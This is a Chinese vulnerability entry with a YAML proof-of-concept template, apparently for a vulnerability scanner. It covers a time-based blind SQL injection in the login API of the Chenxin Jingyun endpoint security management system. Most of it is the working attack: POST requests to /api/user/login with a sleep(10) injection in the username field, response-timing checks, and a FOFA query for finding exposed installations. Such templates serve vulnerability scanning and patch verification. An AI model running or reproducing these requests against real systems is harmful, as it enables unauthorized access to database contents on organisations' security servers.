漏洞描述
辰信领创 辰信景云终端安全管理系统 login存在 SQL注入漏洞,攻击者通过漏洞可以获取数据库敏感信息
FOFA: "辰信景云终端安全管理系统"
v-secure-cloud-login-sqli: 辰信领创 辰信景云终端安全管理系统 login SQL注入
PoC代码[已公开]
id: v-secure-cloud-login-sqli
info:
name: 辰信领创 辰信景云终端安全管理系统 login SQL注入
author: zan8in
severity: high
verified: true
description: |
辰信领创 辰信景云终端安全管理系统 login存在 SQL注入漏洞,攻击者通过漏洞可以获取数据库敏感信息
FOFA: "辰信景云终端安全管理系统"
reference:
- https://peiqi.wgpsec.org/wiki/webapp/%E8%BE%B0%E4%BF%A1%E9%A2%86%E5%88%9B/%E8%BE%B0%E4%BF%A1%E9%A2%86%E5%88%9B%20%E8%BE%B0%E4%BF%A1%E6%99%AF%E4%BA%91%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20login%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
tags: v-secure,sqli
created: 2023/08/09
rules:
r0:
request:
method: POST
path: /api/user/login
body: |
captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*from(select+sleep(10))a)='
expression: response.body.bcontains(b'"errorcode":') && response.body.bcontains(b'"error_str":') && response.latency <= 11000 && response.latency >= 10000
r1:
request:
method: POST
path: /api/user/login
body: |
captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin
expression: response.body.bcontains(b'"errorcode":') && response.body.bcontains(b'"error_str":') && response.latency <= 10000
r2:
request:
method: POST
path: /api/user/login
body: |
captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*from(select+sleep(10))a)='
expression: response.body.bcontains(b'"errorcode":') && response.body.bcontains(b'"error_str":') && response.latency <= 11000 && response.latency >= 10000
expression: r0() && r1() && r2()